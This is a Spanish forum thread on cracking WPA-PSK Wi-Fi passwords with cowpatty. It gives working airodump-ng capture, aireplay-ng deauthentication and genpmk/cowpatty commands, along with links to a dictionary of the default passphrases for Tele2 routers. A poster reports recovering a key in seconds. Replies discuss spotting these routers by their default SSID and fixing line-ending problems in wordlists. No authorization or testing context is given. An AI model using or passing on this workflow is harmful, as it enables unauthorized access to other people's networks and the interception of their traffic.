Autor Tema: Diccionarios WPA+PSK:Cowpatty (Leído 199740 veces)

MMRX · « **en:** 26-02-2008, 20:28 (Martes) »

Buenas, inicio este post que parece interesante el tema.

Creación de un diccionario con el comando 'genpmk'

genmpk -f wpa_tele2.txt -d tele2.dic -s Tele2

-f Archivo de donde cogeremos el texto para el diccionario, en mi caso un archivo en texto plano con 12 MB que van desde IX1V7000000 hasta IX1V7999999

-d Archivo de salida, el archivo nuevo que se creará

-s Essid

*Con este comando creamos un diccionario precomb***do para despues utilizar con el cowpatty(Ojo! a mi me ha tardado poco mas de 6 horas con un core 2 duro a 1.3Ghz)*

Conseguir el Handshake necesario

1 airodump-ng --bssid 00:01:02:03:04:05 -c11 -w psk wifi0
-bssid Mac del ap
-c Canal
-w Nombre de salida del fichero

2 aireplay-ng -0 5 -a 00:01:02:03:04:05 -c 11:22:33:44:55:66 wifi0
-a Mac del ap
-c Mac del cliente autentificado

Dejamos corriendo el airodump para capturar solamente ese ap, en el segundo punto lanzamos un ataque de desautentificación, cuando el cliente reconecte arriba a la derecha veremos la frase 'Handshake 00:01:02:03:04:05', quizas tengamos que repetir el ataque 2 en alguna ocasión, no de forma muy repetida para dar tiempo a reconectar al cliente

Combinando el diccionario creado y el handshake

cowpatty -r psk*.cap -d tele2.dic -s Tele2
-r Ruta del archivo .cap que guarda el airodump
-d Ruta del archivo del diccionario que hemos creado
-s Essid

Con esto lo que hacemos es pasar el fichero.cap por todo el diccionario de forma que en 20 segundos analiza 1.000.000 de passphrases.

Bien, hasta aqui la teorica muy bonita, yo me encuentro en el punto de que he creado el diccionario apartir de un fichero en texto plano, que de la forma tradicional si que me encuentra la key, pero de esta forma no, segun comentamos el problema podria ser el retorno del carro o los saltos de linea.
Dar ideas, y si teneis nuevos diccionarios comentarlo. Espero que el post sea interesante :-' :-' :-' :-' :-'

chinitiw · « **Respuesta #1 en:** 26-02-2008, 20:34 (Martes) »

creo que esto será un buen aporte , quizas os sea de utilidad este enlace aqui ,

si no recuerdo mal he leido algo de un cowpatty plus , si lo encuentro lo posteo

cowpattyp , lo veo muy interesante dejo un enlace a ver que os parece

http://cowpattyp.tk/

creo que te permite hacer sesiones ... y eso tiene una pinta de p... m....

saludos

MMRX · « **Respuesta #2 en:** 26-02-2008, 21:14 (Martes) »

Os he subido los dos ficheros utilizados para este experimento

http://rapidshare.com/files/95172469/PSK_Cowpatty.tar.gz.html

son 36MB esta el fichero en texto plano y el precom****do que he creado.Suerte. y dar ideas

chinitiw · « **Respuesta #3 en:** 26-02-2008, 21:29 (Martes) »

buen aporte ...

MMRX · « **Respuesta #4 en:** 27-02-2008, 12:34 (Miércoles) »

B I N G O ! ! !
Con el nuevo diccionario de hrodgar ha sacado la PSK en menos de 2 segundos tras testear mas de 85.000 passphrases. Os adjunto el link del diccionario:

http://www.megaupload.com/?d=UQCUYVJ6

hrodgar · « **Respuesta #5 en:** 27-02-2008, 20:58 (Miércoles) »

Problema del "retorno de carro de fin de línea" en ficheros de diccionarios en texto plano para generar ficheros de hashes con genpmk para Cowpatty

- Que carajo es el Retorno de carro de fín de línea?

Cuando creas un documento de texto en MSDOS/Windows (como p.e. en Notepad o un programa de generación de diccionarios), Windows añade al final de cada línea un retorno de carro CR (carriage return) y un salto de línea LF (line feed). En cambio, en Linux/Unix, el formato de un documento de texto es solo un LF al final de cada línea. un ejemplo claro:

El típico error que resulta al crear un shell script (bash) o rutina en C en texto bajo windows, si tratas de ejecutarlo en entorno Linux/Unix te dice lo siguiente:

Código: [Seleccionar]

bash: ./programa.txt: /bin/bash^M: bad interpreter: No existe el fichero o el directorio

(Que no me ha pasado veces a mi y era esto...

)

Pues resulta que a la hora de precom****r un diccionario en texto plano en formato windows con el genpmk, el programa te cojera en cada liena la palabra junto con el retorno de carro; en vez de CASA te cojerá CASA[CR]

- Como evitarlo antes de crearlo / como modificarlo?

Lo mejor... crear el fichero de texto bajo linux,.. no falla!

Modificarlo bajo linux:
Tambien, en caso de estar ya en un entorno Linux con un fichero de texto en formato Dos/Windows, se puede recurrir a "una operación de limpieza"; La sencilla: con el comando "dos2unix"; si no disponemos de el, pues con el editor Vi.

Con el dos2unix tan simple como:

Código: [Seleccionar]

dos2unix fichero.txtY ya està, el fichero convertido. facil, no?

Si no disponemos del comando, pues se edita el fichero con Vi:

Código: [Seleccionar]

Vi fichero.txtNos vamos a la última linea:

Código: [Seleccionar]

^Gcon lo que saldra ":" en la línea de comando, y le decimos que desde la primera línea hasta la última ($) sustituye s ^M por nada. Sería así:

Código: [Seleccionar]

:1,$ s/{ctrl-V}{ctrl-M}//      (esto es, presionar ctrl-v y ctrl-m)
(en pantalla se verá esto:)
:1,$ s/^M//

y guardamos y salimos con x

Vale, en caso de que utilicemos Windows?

Facil, no utilizar el notepad, word, .... En cambio, se puede utilizar el programa Notepad++. Si no lo conoceis, es gratuito y le da mil vueltas al notepad.

En el caso de un fichero nuevo, simplemente antes de guardarlo, os vais a "Format" y seleccionais "Convert to UNIX format" en lugar del que es por defecto (Dos/Windows). si os fijais en el lateral derecho inferior de la ventana, donde antes salia Dos/Windows ahora os pondra UNIX. De esta manera no habrà los retornos de carro.

En el caso de un fichero existente o como p.e. el creado por un programa windows de generacion de diccionarios, pues procedemos de igual manera; abrimos el fichero con el Notepad++ y seleccionamos Format/Convert to UNIX format. Y ya esta, eliminados los dichosos retornos de carro del fichero.

Notas:
eliminar el retorno de carro no es un plisplas... se puede tirar rato (por no decir una hora o mas) como tengas un fichero enorme...
Eliminar el retorno de carro no estropea el fichero de texto para ser utilizado en texto plano.

Y ahora ya podemos crear el fichero de hashes con genpmk.

MMRX · « **Respuesta #6 en:** 27-02-2008, 21:25 (Miércoles) »

Grandisimo ejemplo. Totalmente aclarado y solucionado el tema, empezamos con el resto de essid que no sean Tele2?

berni69 · « **Respuesta #7 en:** 28-02-2008, 14:36 (Jueves) »

cambio el titulo del post

MMRX · « **Respuesta #8 en:** 29-02-2008, 11:09 (Viernes) »

Podrias explicar donde conseguir fácilmente el 'dos2unix'.
Gracias

Manbostar · « **Respuesta #9 en:** 29-02-2008, 13:21 (Viernes) »

Buenas

Converting text files to/from Unix/Dos/Mac
http://www.gammon.com.au/files/pennmush/unix2dos.zip - 19K - program to convert unix text files to DOS format
http://www.gammon.com.au/files/pennmush/dos2unix.zip - 19K - program to convert DOS text files to Unix format
http://www.gammon.com.au/files/pennmush/mac2unix.zip - 19K - program to convert Macintosh text files to Unix format
http://www.gammon.com.au/files/pennmush/unix2mac.zip - 19K - program to convert Unix text files to Macintosh format
http://www.gammon.com.au/files/pennmush/unix2dos.c - 7K - source code used to compile above 4 conversion programs

Saludos

MMRX · « **Respuesta #10 en:** 29-02-2008, 23:18 (Viernes) »

Muchas gracias por la aportación.

sony_vaio · « **Respuesta #11 en:** 17-10-2008, 00:28 (Viernes) »

disculpen x mi ignoracia (es que soy novato en esto), alguien sabe como instalar el cowpatty??? $:-\$
u otros programas para WPA (diccionarios pues)

muchas gracias...

Elwyn · « **Respuesta #12 en:** 23-11-2008, 03:41 (Domingo) »

Entonces....

Para Crear el Diccionario usando genmpk mas el Diccionario de hrodgar Seria asi:

genmpk -f Tele2_wpa_IX1V7.hashes -d tele2.dic -s Tele2

Asi¿? o e entendido todo mal :S?

TONI100W · « **Respuesta #13 en:** 09-12-2008, 20:40 (Martes) »

Soy muy novato en esto, la pregunta seguramente sera tonta, pero como no encuentro la respuesta, pues la hago aqui...

Una vez descargado el diccionario, en que carpeta lo guardo??

venga muchas gracias, saludos.

madala · « **Respuesta #14 en:** 10-12-2008, 11:36 (Miércoles) »

Todo esto de la generacion de diccionarios y las rainbow tables esta muy bien, la forma de proceder está muy bien explicada por MMRX y los problemas con los ficheros de texto plano y su solución se resuelven muy bien con la aclaración de hrodgar. Lo he probado y funciona correctamente pero me inquieta el no saber qué estoy haciendo, me explico: Empiezo pididendo disculpas si esto está en algún otro lugar del foro (yo no lo he encontrado, supongo que sera torpeza mía), pero me gustaría saber qué tipo de diccionarios hay que tener en texto plano. MMRX nos proporciona uno que va desde IX1V7000000 hasta IX1V7999999 para Tele2. ¿Qué significa esto? ¿Son las passphrases habituales o por defecto para Tele2? ¿Cómo sabemos qué compañía está detrás del AP si su SSID no es tan claro como Tele2? Porque puede pasar que sea Tele2 pero el AP haya cambiado el nombre del SSID por (p.e.) MANZANOS. Serviría entonces el mismo diccionario base sabiendo que es de Tele2 pero haciendo "genmpk -f wpa_tele2.txt -d tele2.dic -s MANZANOS" ??

Otra cuestión que no entiendo: efectivamente el cowpatty con el archivo de hashes generado para la SSID correspondiente es muy rápido, pero entiendo que el hash no aporta ninguna passphrase nueva y solamente permite ir más rápido. ¿Dónde está lo interesante dado que para generar el archivo de hashes con genmpk empleo tanto o más tiempo que corriendo directamente cowpatty con el diccionario de phrases original? ¿O estoy confundido y genmpk es más rápido que cowpatty con el diccionario original?

¿Como sabemos que tipo de texto plano es adecuado para según que AP? ¿O simplemente es cuestión de probrar con lo más original que se nos ocurra?

Hecho en falta eso: un poquito más de explicación, teoría (llámese como se quiera) para comprender qué son los inputs y outputs que alimentan estas utilidades. si alguien sabe de algún post que lo haga, agradeceré la información.

Disculpas si estoy preguntando chorradas, quizás haya gente buena en el foro y todo esto lo dan por supuesto. Yo soy recién llegado a este mundo, creo que empiezo a saber "algo" pero los fundamentos me fallan.

Gracias.

MMRX · « **Respuesta #15 en:** 18-12-2008, 21:22 (Jueves) »

Intentaré responderte a todo lo que preguntas.

- El diccionario que yo adjunto con las IX1V7000000, son las passpharases habituales para los routers Telsey de Tele2, por defecto vienen con el ESSID Tele2 y con alguno de esos pass con WPA activa por defecto.

- Cuanto preguntas: Cómo sabemos qué compañía está detrás del AP si su SSID no es tan claro como Tele2? Yo todas las pruebas que he hecho son con ESSID Tele2, porque como te he dicho, por defecto traen esa y es facilemente reconocible.

- A esto: ¿Dónde está lo interesante dado que para generar el archivo de hashes con genmpk empleo tanto o más tiempo que corriendo directamente cowpatty con el diccionario de phrases original?
te respondo de una forma muy muy simple, un ejemplo: En pasar un diccionario en texto plano tardas 5 horas, y en generar ese mismo diccionario a precom** tardas 5 horas y en pasarlo 0,2 segundos. Una vez que has estado las 5 horas pre*com**pilan*dolo ya lo tienes, y no tienes que volver a generarlo, solo es usar y usar, por lo que en vez de para cada prueba que hagas estarte 5 horas, solo te estas una unica vez 5 horas.

Creo que respondo a todas tus dudas, saludos.

madala · « **Respuesta #16 en:** 20-12-2008, 01:58 (Sábado) »

MMRX, respondes perfectamente. Entiendo que el precombinado puedes utilizarlo en mas ocasiones una vez generado y es mas rapido. OK. Si tienes varios AP Tele 2 es OK. Tambien entiendo que si dejan el ESSID por defecto Tele 2 son claramente identificables, no sabia si era facil cambiarlas, pero en ese caso no hay lugar a la duda. Creo que me has aclarado bastante cosas. Agradecido.

borekon · « **Respuesta #17 en:** 24-12-2008, 13:02 (Miércoles) »

Hola!

Que buenos diccionarios

¿Sabeis dónde puedo conseguir más de estos? Me baje unos 4 gigas de tablas rainbow del torrent y son archivos que en su interior no tienen mas que retorno de carro

no se si porque no me baje los correctos o poque me faltó algo.
De momento estoy haciendo uno para netgear. Creo que ocupara mas o menos unas 500 o 700 megas

y tardara su semana y pico. Si os interesa, podria subirlo en cuanto lo tenga

Un saludo y felices fiestas

MMRX · « **Respuesta #18 en:** 20-02-2009, 20:07 (Viernes) »

Perdona por responder tan tarde, pero he estado desconectado de este mundillo.
Yo no tengo diccionarios la verdad, cuando hago pruebas me bajo uno cualquiera y para verificar si consigo la pass añado la pass en alguna linea del diccionario y si salta es que la pilla, sin mas, para hacer pruebas suficiente.

hombreolo45 · « **Respuesta #19 en:** 08-03-2009, 18:18 (Domingo) »

hola. me gustaría saber en qué directorio y cómo puedo copiar los archivos que servirán de diccionario. gracias.

Noticias:

Autor Tema: Diccionarios WPA+PSK:Cowpatty (Leído 199740 veces)

MMRX

chinitiw

MMRX

chinitiw

MMRX

hrodgar

MMRX

berni69

MMRX

Manbostar

MMRX

sony_vaio

Elwyn

TONI100W

madala

MMRX

madala

borekon

MMRX

hombreolo45